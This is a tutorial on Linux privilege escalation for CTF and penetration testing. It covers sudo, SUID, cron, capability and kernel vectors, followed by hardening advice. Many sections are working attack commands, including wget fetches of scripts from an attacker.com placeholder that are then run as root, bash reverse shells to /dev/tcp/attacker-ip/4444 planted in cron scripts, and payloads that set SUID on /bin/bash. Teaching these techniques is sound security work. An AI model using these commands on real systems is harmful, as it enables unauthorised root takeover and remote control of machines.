Ethical Hacking #privilege-escalation#linux#ctf

Linux Privilege Escalation Techniques

Master privilege escalation techniques for CTF and penetration testing. Learn common misconfigurations and exploitation methods.

10 min read

Introduction to Linux Privilege Escalation

Privilege escalation is the process of increasing access levels from a limited user account to root or another privileged user. After initial compromise, attackers seek to escalate privileges to access sensitive data, modify system configurations, and maintain persistent access. Understanding privilege escalation techniques is fundamental to both offensive and defensive security.

In CTF competitions and authorized penetration testing, privilege escalation demonstrates complete system compromise. This tutorial covers the most common Linux privilege escalation vectors, exploitation techniques, and defensive measures.

Enumerating the System

Before attempting escalation, gather system information to identify potential vulnerabilities.

Basic Enumeration Commands

# Current user and groups
id
whoami
groups

# System information
uname -a
cat /etc/os-release
lsb_release -a

# Kernel version
uname -r

# Installed packages
dpkg -l  # Debian/Ubuntu
rpm -qa  # RedHat/CentOS

Identify Sudoers and Permissions

# Check sudoers configuration
sudo -l

# If you have a password, attempt to run commands as other users
sudo -u username whoami

# Find files owned by root with SUID bit
find / -perm -4000 -type f 2>/dev/null

# Find world-writable directories
find / -perm -002 -type d 2>/dev/null

# Find GUID bit set files
find / -perm -2000 -type f 2>/dev/null

Check Running Processes

# View all processes with user context
ps aux

# Look for processes running as root
ps aux | grep root

# Monitor process creation
watch -n 0.1 'ps aux | head -20'

Sudo Misconfiguration Exploitation

Sudo Without Password

If sudoers allows command execution without a password, direct escalation is possible:

# Check sudoers permissions
sudo -l

# Example output:
# User may run the following commands:
#   (root) NOPASSWD: /usr/bin/wget

If /usr/bin/wget can run as root without a password:

# Create malicious script
sudo wget http://attacker.com/malicious.sh -O /tmp/script.sh
sudo bash /tmp/script.sh

Sudo with Command Restrictions

Restricted sudo commands may have bypasses. Common vulnerable commands:

Wget exploitation:

sudo wget http://attacker.com/shell.sh -O /dev/shm/shell.sh
bash /dev/shm/shell.sh

Vim exploitation:

sudo vim
# Inside vim:
:set shell=/bin/bash
:shell
# Now you have a shell as root

Git exploitation:

sudo git config --global core.editor '/bin/bash'
sudo git -c core.editor='/bin/bash' commit --allow-empty --no-verify

Less/More exploitation:

sudo less /etc/passwd
# Inside less, type:
# !bash  (executes shell command)

Wildcard Injection

Commands using wildcards in cron jobs may be exploitable:

# Vulnerable cron entry:
# * * * * * tar -czf /backup/backup.tar.gz /home/user/*

# Create malicious file
touch /home/user/'--checkpoint=1'
touch /home/user/'--checkpoint-action=exec=bash shell.sh'

# When cron executes, tar interprets these as arguments
# causing arbitrary command execution

SUID Bit Exploitation

Files with the SUID bit can execute with owner privileges.

Finding SUID Programs

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Output might include:
# /usr/bin/passwd
# /usr/bin/sudo
# /usr/bin/chsh
# /usr/local/bin/custom-admin  (potentially vulnerable)

String Binary Exploitation

If a SUID binary uses system() or exec() with an unsanitized path:

# Vulnerable binary source code:
// #include <stdlib.h>
// int main() {
//   system("cat /root/flag.txt");
//   return 0;
// }

# Compiled as SUID:
gcc -o suid suid.c
sudo chown root suid && sudo chmod 4755 suid

# Create malicious 'cat' in attacker's PATH
echo -e '#!/bin/bash\n/bin/bash' > ~/cat
chmod +x ~/cat
export PATH=~:$PATH
./suid  # Now executes our cat, spawning a root shell

Library Injection

Programs that load libraries without full paths may be exploitable:

# Check library dependencies
ldd /usr/local/bin/vulnerable-program

# Example vulnerable output:
# libutils.so => not found

# Create malicious library
gcc -shared -fPIC -o libutils.so evil.c
export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
/usr/local/bin/vulnerable-program  # Loads our malicious library

Kernel Exploit Vulnerabilities

Outdated kernels contain exploitable vulnerabilities. Identify and exploit them:

# Check kernel version
uname -r
# Example: 4.4.0-59-generic

# Search for known exploits
searchsploit linux kernel 4.4.0
# Or use kernel exploit checker
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

CVE-2016-5195 (Dirty COW)

An example of a critical kernel vulnerability:

# Compile and execute exploit
gcc -pthread dirty_cow.c -o dirty_cow -lutil
./dirty_cow /etc/passwd

# Or download pre-compiled exploit
wget https://github.com/dirtycow/dirtycow.github.io/blob/master/run.sh
bash run.sh

Cron Job Exploitation

Misconfigured cron jobs often provide escalation opportunities:

World-Writable Cron Scripts

# Find cron jobs
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.daily/

# Check for world-writable scripts
ls -la /etc/cron.daily/backup.sh

# If writable, modify it
echo 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1' >> /etc/cron.daily/backup.sh

# Wait for cron to execute as root

Path Hijacking in Cron

# Vulnerable cron job:
# * * * * * /usr/bin/backup.sh

# Script content:
# #!/bin/bash
# tar -czf backup.tar.gz /home/user/files

# Exploit: Create malicious 'tar' in /tmp
echo '#!/bin/bash' > /tmp/tar
echo 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1' >> /tmp/tar
chmod +x /tmp/tar

# Modify PATH if possible
export PATH=/tmp:$PATH

Capability Exploitation

Linux capabilities provide fine-grained privilege separation:

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example vulnerable output:
# /usr/bin/python3 = cap_setuid+ep

# Exploit:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Practical Privilege Escalation Scenario

Simulate a complete CTF-style escalation:

Step 1: Enumerate system

id
sudo -l
cat /etc/crontab
find / -perm -4000 -type f 2>/dev/null

Step 2: Identify vector

# Found vulnerable service running as root
ps aux | grep root
# /usr/local/bin/vulnerable-service

# Check for exploitable code path
strings /usr/local/bin/vulnerable-service | grep system

Step 3: Develop exploit

# Service uses system() with injectable parameter
# Create payload
echo -e '#!/bin/bash\nchmod 4755 /bin/bash' > /tmp/privesc.sh
chmod +x /tmp/privesc.sh

Step 4: Execute escalation

# Trigger vulnerability with our payload
/usr/local/bin/vulnerable-service "../privesc.sh"

# Verify root access
/bin/bash -p
id  # Should show uid=0(root)

Defensive Measures

System Hardening

Minimize SUID binaries:

# Review SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Remove unnecessary SUID bits
chmod u-s /usr/bin/custom-admin

Restrict sudo:

# Limit sudo commands in /etc/sudoers
username ALL=(root) NOPASSWD: /usr/bin/specific-command

# Never allow:
# username ALL=(ALL) NOPASSWD: ALL

Secure file permissions:

# Ensure important files aren't world-writable
chmod 755 /etc/cron.d/
chmod 755 /etc/cron.daily/

Keep systems updated:

# Regular patching prevents kernel exploits
apt update && apt upgrade

Tools for Privilege Escalation Testing

  • linpeas.sh: Comprehensive automated enumeration
  • linux-exploit-suggester: Identifies kernel exploits
  • GTFOBins: Database of Unix binaries for exploitation
  • pspy: Monitor running processes in real-time

Conclusion

Linux privilege escalation requires methodical enumeration, understanding of system configuration, and knowledge of common vulnerability patterns. Sudo misconfigurations, SUID exploitation, and kernel vulnerabilities consistently provide escalation paths in real systems.

Practice privilege escalation on CTF platforms like HackTheBox and TryHackMe. In authorized penetration tests, focus on the most impactful escalation vectors first—sudo exploits often require less effort than kernel compilation. Always maintain detailed documentation of your escalation techniques for your assessment report.

#sudo #penetration-testing #ctf #linux #privilege-escalation

// related articles

ethical-hacking Linux Privilege Escalation Techniques and Tools 7 min read ethical-hacking Linux Post-Exploitation Enumeration Guide 7 min read ethical-hacking BeEF Browser Exploitation Framework: Lab Guide 7 min read